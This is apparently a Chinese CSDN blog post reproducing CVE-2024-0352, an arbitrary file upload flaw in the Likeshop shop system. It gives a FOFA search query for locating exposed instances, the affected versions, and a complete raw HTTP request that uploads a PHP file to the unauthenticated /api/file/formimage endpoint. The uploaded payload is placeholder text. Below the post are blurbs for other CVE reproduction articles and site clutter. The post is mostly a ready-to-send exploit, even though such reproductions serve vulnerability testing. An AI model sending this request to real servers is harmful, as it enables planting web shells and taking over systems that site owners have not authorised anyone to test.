Likeshop userFormImage任意文件上传(CVE-2024-0352)

最新推荐文章于 2024-08-13 09:43:49 发布
最新推荐文章于 2024-08-13 09:43:49 发布
阅读量495 收藏 7
点赞数 10
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64366018/article/details/135710657
版权

0x01 fofa语句

 icon_hash="874152924"

0x02 影响版本

version<= 2.5.7.20210311

0x03 漏洞复现

!!!!注意,在HTTP/2,有时候需要改成 HTTP/1.1,需要看原始网站的数据包

POST /api/file/formimage HTTP/2
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip, deflate

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="test.php"
Content-Type: application/x-php

test!hahahahaha。
------WebKitFormBoundarygcflwtei--

 

柯达_
关注
Likeshop 单商户商城系统 任意文件上传漏洞复现(CVE-2024-0352)
0xSec
11-23 1678
likeshop单商户标准商城系统/api/file/formImage接口存在任意文件上传漏洞,由于系统对用户上传的文件类型未作任何过滤和限制,未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。
likeshop-php商城源码和小程序商城源码
08-27
这样无形之中才可以为我们多宣传宣传,让更多用户能够使用likeshop,否则既没有实现大家的价值又没有创造团队收入,企业版拿来免费商用就没有太大的意义了。如果觉得likeshop确实挺好用也好二开,也欢迎购买授权,...
漏洞复现--Likeshop任意文件上传(CVE-2024-0352)
qq_53003652的博客
01-16 1836
Likeshop是一个100%开源免费的B2B2C多商户商城系统,支持官方旗舰店,商家入驻,平台抽佣+商家独立结算,统一下单+订单拆分等功能。该产品存在任意文件上传,攻击者可通过此漏洞上传木马获取服务器权限。
CVE-2024-38077漏洞复现及修复(无坑版教程)
最新发布
weixin_61782918的博客
08-13 7707
微软超高危“狂躁许可”漏洞CVE-2024-38077的检测及修复过程
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
nnn2188185的博客
01-17 408
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
CVE-2024-0569复现及IDS snort防御
2401_82670286的博客
01-29 532
发现了一个被归类为有问题的漏洞,该漏洞存在于Totolink T8 4.1.5cu.833_20220905版本中。该漏洞影响了文件/cgi-bin/cstecgi.cgi中Setting Handler组件的getSysStatusCfg功能。对参数ssid/key的操纵导致信息泄露。攻击者可以远程发起攻击。该漏洞已经公开披露并可能被滥用。升级到版本4.1.5cu.862_B20230228可以解决此问题。建议升级受影响的组件。该漏洞被分配了识别号VDB-250785。
CVE-2024-0352 likeshop v2.5.7文件上传漏洞分析
shelter1234567的博客
01-29 1099
本次的漏洞研究基于thinkPHP开发开的一款项目.....
【漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
alert['Hello World']
07-17 412
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
likeshopv2-master.zip
03-16
LikeShop100%开源免费商用电商系统,PC、H5、小程序、安卓APP、苹果APP全部100%开源,免费商用。LikeShop适合以下场景:B2C,新零售,社交电商,分销系统,分销电商,小程序,商城源码,商城系统,单商户,多商户,...
likeshop单商户开源商城系统 v2.5.7
07-06
likeshop单商户开源商城系统,公众号商城、H5商城、小程序商城、安卓APP商城、苹果APP商城代码全开源,免费商用。适用场景:B2C商城,新零售商城,社交电商商城,分销系统商城,分销电商商城,小程序商城,商城源码...
uniapp商户系统-php后台-带管理系统
06-27
【标题】"uniapp商户系统-php后台-带管理系统"揭示了这是一个使用uniapp技术构建的商户销售系统,其后端采用PHP语言,并且包含了管理系统的功能。uniapp是一个跨平台的开发框架,允许开发者编写一次代码,即可在多个...
likeshop.sql
04-17
https://github.com/jsoncc/ssmtemplate项目的配套数据库
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_83946826的博客
04-16 1706
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2024-21644复现
Dkive的博客
03-04 724
CVE-2024-21644漏洞复现
[漏洞复现] SpiderFlow (CVE-2024-0195)
k5664524的博客
01-11 1182
SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器
Likeshop任意文件上传(CVE-2024-0352)
weixin_62352348的博客
01-29 398
Likeshop是一款完全开源免费的B2B2C多商户商城系统,旨在为企业提供强大的电子商务平台。无论是官方旗舰店、商家入驻、平台抽佣+商家独立结算还是统一下单+订单拆分,Likeshop都提供了全面的解决方案,满足企业的不同需求。该产品存在任意文件上传漏洞。
漏洞复现-wordpress RCE-CVE-2024-25600,疯狂膜拜
m0_54903333的博客
04-11 511
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
【漏洞预警】Linux kernel权限提升漏洞(CVE-2024-1086)
热门推荐
qq_18209847的博客
04-08 1万+
Linux内核版本v5.14 – v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞,由于在nft_verdict_init()函数中,允许正值作为hook判决中的丢弃错误,因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时,nf_hook_slow()函数可能会导致双重释放漏洞,本地低权限威胁者可利用该漏洞将权限提升为root。加强系统和网络的访问控制,修改防火墙策略,关闭非必要的应用端口或服务,减少将危险服务(如SSH、RDP等)暴露到公网,减少攻击面。
一文搭建复现并分析CVE-2024-25600 WordPress Bricks Builder RCE最新漏洞
tlp_zzm的博客
04-01 1721
一文搭建复现并分析CVE-2024-25600 WordPress Bricks Builder RCE最新漏洞
likeshop跑腿
02-07
likeshop跑腿是一种基于移动互联网的即时配送服务平台。它通过将用户的需求与附近的跑腿人员进行匹配,实现快速、便捷的商品配送服务。 用户可以通过likeshop跑腿的手机应用程序或者网页进行下单。用户需要提供详细的配送信息,包括取货地址、收货地址、联系方式等。系统会根据用户的需求和附近的跑腿人员的位置进行匹配,并派遣最合适的跑腿人员进行配送。 跑腿人员接到订单后,会尽快前往取货地点,并将货物送达指定的收货地址。在配送过程中,用户可以实时追踪订单的状态,包括跑腿人员的位置和预计送达时间。 likeshop跑腿的优势在于快速、灵活和便捷。它可以满足用户对于即时配送的需求,无论是购物、外卖还是文件传递等。同时,跑腿人员也可以通过likeshop跑腿平台获取额外的收入,提高工作效率和灵活性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值